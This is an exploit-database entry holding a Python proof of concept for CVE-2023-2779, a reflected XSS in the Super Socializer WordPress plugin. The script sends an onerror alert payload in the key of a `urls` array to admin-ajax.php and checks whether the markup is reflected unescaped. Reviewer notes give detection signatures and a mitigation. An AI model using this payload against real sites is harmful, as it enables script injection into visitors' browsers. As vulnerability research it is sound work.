
8 changes to exploits/shellcodes/ghdb Nokia ASIKA 7.13.52 - Hard-coded private key disclosure SPIP v4.2.1 - Remote Code Execution (Unauthenticated) Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) Super Socializer 7.13.52 - Reflected XSS WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
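# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
#
# Reviewer notes:
# - What this checks: the script sends one request to admin-ajax.php with
#   action=the_champ_sharing_count and places HTML markup in the *key* of the
#   `urls` array. It then looks for that markup, unescaped, in the response
#   body. A match shows the key is reflected without output encoding; it does
#   not by itself show that a browser ran the handler.
#   NOTE(review): whether a browser renders the reflected markup also depends
#   on the response Content-Type, so confirm that header before rating impact.
# - The header's "Dork" line shows the same parameters in a GET query string,
#   while the script below uses POST; both forms are worth covering in tests
#   and in log review.
# - Detection: requests to admin-ajax.php carrying this action with `<`, `>`
#   or their percent-encoded forms inside the `urls[...]` key are the
#   log/WAF signature suggested by this proof of concept.
# - Mitigation: update the plugin to a release the vendor lists as fixed for
#   the CVE above; the code-level fix is to sanitise the `urls` keys on input
#   and escape them wherever they are echoed.
import requests

# The URL of the AJAX endpoint under test (example.com is a placeholder)
url = "https://example.com/wp-admin/admin-ajax.php"

# Marker markup placed in the array key; per the original author's note the
# key is not properly sanitized and escaped by the affected version
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# Form fields for the request: the AJAX action plus a `urls` entry whose key
# carries the marker
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Without a timeout requests can block indefinitely on an unresponsive host
TIMEOUT_SECONDS = 10

# Send a POST request to the endpoint; report transport failures as such
# instead of letting them surface as a traceback
try:
    response = requests.post(url, data=payload, timeout=TIMEOUT_SECONDS)
except requests.RequestException as exc:
    raise SystemExit(f"Request failed: {exc}")

# Look for the marker reflected verbatim (unescaped) in the body. The same
# variable is used for sending and matching so the two cannot drift apart.
# A hit means unescaped reflection; a miss means only that this exact string
# was not echoed, not that the site is known to be safe.
if vulnerable_param in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")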